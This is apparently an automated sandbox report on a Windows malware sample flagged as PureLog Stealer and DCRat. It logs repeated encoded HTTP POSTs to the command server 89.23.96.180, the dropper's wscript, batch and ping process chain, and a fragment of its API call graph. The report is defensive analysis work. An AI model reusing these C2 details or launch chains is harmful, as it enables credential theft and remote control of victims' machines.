                                                                                  Data Ascii: X^CVXZWVU^UZT\P]WZ\URWQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C. 2))9.Y?%/0S-^! ?&!(8(=,^>%!_.#Q,
                                                                                  Dec 21, 2024 10:04:01.236602068 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:04:01.472637892 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:04:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 54 21 28 2a 0e 3c 04 2b 5b 2a 06 31 0c 3e 07 22 59 2c 1c 06 06 22 05 25 01 29 2e 27 13 30 00 23 10 21 3a 07 58 22 3f 24 00 29 31 2e 58 01 1e 21 41 20 33 21 53 27 01 2f 57 2a 19 3d 03 28 10 39 03 30 06 2c 0a 25 03 23 06 3f 14 23 0f 27 2e 3a 5c 3b 11 06 06 3c 2e 34 1c 27 0c 2b 51 03 1e 26 1f 26 3c 34 0a 32 1d 13 11 26 2d 2a 00 20 58 33 52 3f 3b 2f 50 23 28 3a 5f 3b 17 05 01 2b 3e 3d 02 2a 28 31 02 27 05 20 0d 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989T!(*<+[*1>"Y,"%).'0#!:X"?$)1.X!A 3!S'/W*=(90,%#?#'.:\;<.4'+Q&&<42&-* X3R?;/P#(:_;+>=*(1' 2#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  65192.168.2.55000589.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:03:59.978409052 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:04:00.328082085 CET2536OUTData Raw: 5d 51 46 55 5d 5e 57 5f 55 5e 55 5a 54 58 50 56 57 52 5c 5f 52 55 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]QFU]^W_U^UZTXPVWR\_RUQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:,T%.6>!]-8]$?V-*45X22-?4#+*5!_.#Q,*
                                                                                  Dec 21, 2024 10:04:01.354269028 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:04:01.588186026 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:04:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  66192.168.2.55000689.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:04:01.834629059 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:04:02.187351942 CET2536OUTData Raw: 5d 54 43 52 5d 56 57 50 55 5e 55 5a 54 52 50 53 57 53 5c 5c 52 52 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]TCR]VWPU^UZTRPSWS\\RRQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C-8%.=T)2%_-<8X00-^6#/9&=+$Z>-?=!_.#Q,
                                                                                  Dec 21, 2024 10:04:03.209317923 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:04:03.444094896 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:04:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  67192.168.2.55001289.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:04:03.678956032 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:04:04.031035900 CET2536OUTData Raw: 58 56 43 53 58 5b 52 55 55 5e 55 5a 54 5a 50 5c 57 58 5c 5f 52 54 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XVCSX[RUU^UZTZP\WX\_RTQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ B-$1-5>1,/$/,( Y*%=+?$*!_.#Q,"
                                                                                  Dec 21, 2024 10:04:05.056436062 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:04:05.296211958 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:04:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  68192.168.2.55001889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:04:05.536557913 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:04:05.890415907 CET2536OUTData Raw: 58 52 43 50 58 5c 52 52 55 5e 55 5a 54 53 50 55 57 5b 5c 5f 52 52 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XRCPX\RRU^UZTSPUW[\_RRQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-! R%=.?!!9?,Y0/:;=#<>&U( (?=!_.#Q,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  69192.168.2.55002489.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:04:06.606142998 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:04:06.952985048 CET2112OUTData Raw: 58 51 43 50 58 5d 52 50 55 5e 55 5a 54 5e 50 55 57 53 5c 5e 52 5e 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XQCPX]RPU^UZT^PUWS\^R^QYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.<&=9V=!.<X0/0-97:'">W<?-)5!_.#Q,2
                                                                                  Dec 21, 2024 10:04:07.984081030 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:04:08.216196060 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:04:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 11 21 2b 36 0c 28 29 2f 10 2a 01 36 51 2a 10 0b 01 3b 0c 33 15 21 3c 3e 5f 29 13 3f 59 24 2e 05 1e 22 14 2d 5c 21 01 33 1d 3e 1b 2e 58 01 1e 22 1a 21 20 2e 0f 24 06 33 1c 3d 37 32 5c 3c 3d 32 58 27 11 30 0f 24 2a 23 06 3f 39 2f 0f 25 3d 00 12 3b 01 28 03 2b 3d 23 0c 30 0c 2b 51 03 1e 26 5d 31 2c 37 11 25 1d 1c 07 24 3d 22 04 37 3e 0e 0c 3e 01 2c 0e 37 02 36 5c 3b 00 3f 05 3f 3d 22 5d 3d 5e 25 06 27 5a 23 53 26 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989!+6()/*6Q*;3!<>_)?Y$."-\!3>.X"! .$3=72\<=2X'0$*#?9/%=;(+=#0+Q&]1,7%$="7>>,76\;??="]=^%'Z#S&>#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  70192.168.2.55002589.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:04:06.726089001 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:04:07.078032970 CET2536OUTData Raw: 5d 53 46 50 58 5b 57 50 55 5e 55 5a 54 5d 50 56 57 5c 5c 5a 52 51 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]SFPX[WPU^UZT]PVW\\ZRQQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9" V16=).0X0<$W:-V /9[12*P($ ?.$[)!_.#Q,>
                                                                                  Dec 21, 2024 10:04:08.103303909 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:04:08.340126991 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:04:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  71192.168.2.55003189.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:04:08.586894035 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:04:08.937341928 CET2536OUTData Raw: 58 50 43 57 5d 5d 57 57 55 5e 55 5a 54 58 50 55 57 53 5c 5c 52 56 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XPCW]]WWU^UZTXPUWS\\RVQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D,1T1*>1%.?'0,8U:"7?:&22?'+<= *!_.#Q,*
                                                                                  Dec 21, 2024 10:04:09.964426041 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:04:10.200381994 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:04:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:04:02:04
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Users\user\Desktop\9FwQYJSj4N.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\9FwQYJSj4N.exe"
                                                                                  Imagebase:0x1000000
                                                                                  File size:10'714'393 bytes
                                                                                  MD5 hash:9342BE038F6FF329AAFFDC2626F8D145
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:04:02:05
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe"
                                                                                  Imagebase:0x700000
                                                                                  File size:147'456 bytes
                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:04:02:09
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "
                                                                                  Imagebase:0x790000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:04:02:09
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:04:02:09
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\providerBrowserruntimeCrt/Providerbroker.exe"
                                                                                  Imagebase:0x450000
                                                                                  File size:10'393'088 bytes
                                                                                  MD5 hash:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 79%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:04:02:16
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat"
                                                                                  Imagebase:0x7ff6a7180000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:04:02:16
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:04:02:16
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:chcp 65001
                                                                                  Imagebase:0x7ff602970000
                                                                                  File size:14'848 bytes
                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:04:02:16
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:ping -n 10 localhost
                                                                                  Imagebase:0x7ff6ed4e0000
                                                                                  File size:22'528 bytes
                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:04:02:25
                                                                                  Start date:21/12/2024
                                                                                  Path:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"
                                                                                  Imagebase:0xb10000
                                                                                  File size:10'393'088 bytes
                                                                                  MD5 hash:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 79%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.5%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:9.3%
                                                                                    Total number of Nodes:1492
                                                                                    Total number of Limit Nodes:45
                                                                                    execution_graph 25455 101a400 GdipDisposeImage GdipFree 25456 101d600 70 API calls 25409 1022900 6 API calls 4 library calls 25411 102a700 21 API calls 25457 1026000 QueryPerformanceFrequency QueryPerformanceCounter 25459 102f200 51 API calls 25412 1001710 86 API calls 25413 101ad10 73 API calls 25462 101c220 93 API calls _swprintf 25464 102f421 21 API calls __vsnwprintf_l 25465 1001025 29 API calls 25417 101f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25418 101ff30 LocalFree 25467 102c030 GetProcessHeap 25468 101a440 GdipCloneImage GdipAlloc 25469 1023a40 5 API calls CatchGuardHandler 25421 1031f40 CloseHandle 25472 101e455 14 API calls ___delayLoadHelper2@8 24269 101cd58 24270 101ce22 24269->24270 24277 101cd7b 24269->24277 24273 101c793 _wcslen _wcsrchr 24270->24273 24297 101d78f 24270->24297 24274 101d40a 24273->24274 24278 101ca67 SetWindowTextW 24273->24278 24283 101c855 SetFileAttributesW 24273->24283 24289 101cc31 GetDlgItem SetWindowTextW SendMessageW 24273->24289 24291 101cc71 SendMessageW 24273->24291 24296 1011fbb CompareStringW 24273->24296 24321 101b314 24273->24321 24325 101a64d GetCurrentDirectoryW 24273->24325 24327 100a5d1 6 API calls 24273->24327 24328 100a55a FindClose 24273->24328 24329 101b48e 76 API calls 2 library calls 24273->24329 24330 1023e3e 24273->24330 24276 1011fbb CompareStringW 24276->24277 24277->24270 24277->24276 24278->24273 24284 101c90f GetFileAttributesW 24283->24284 24295 101c86f __cftof _wcslen 24283->24295 24284->24273 24287 101c921 DeleteFileW 24284->24287 24287->24273 24288 101c932 24287->24288 24290 1004092 _swprintf 51 API calls 24288->24290 24289->24273 24292 101c952 GetFileAttributesW 24290->24292 24291->24273 24292->24288 24293 101c967 MoveFileW 24292->24293 24293->24273 24294 101c97f MoveFileExW 24293->24294 24294->24273 24295->24273 24295->24284 24326 100b991 51 API calls 2 library calls 24295->24326 24296->24273 24299 101d799 __cftof _wcslen 24297->24299 24298 101d9e7 24298->24273 24299->24298 24300 101d8a5 24299->24300 24301 101d9c0 24299->24301 24346 1011fbb CompareStringW 24299->24346 24343 100a231 24300->24343 24301->24298 24305 101d9de ShowWindow 24301->24305 24305->24298 24306 101d8d9 ShellExecuteExW 24306->24298 24313 101d8ec 24306->24313 24308 101d8d1 24308->24306 24309 101d925 24348 101dc3b 6 API calls 24309->24348 24310 101d97b CloseHandle 24311 101d989 24310->24311 24312 101d994 24310->24312 24349 1011fbb CompareStringW 24311->24349 24312->24301 24313->24309 24313->24310 24315 101d91b ShowWindow 24313->24315 24315->24309 24317 101d93d 24317->24310 24318 101d950 GetExitCodeProcess 24317->24318 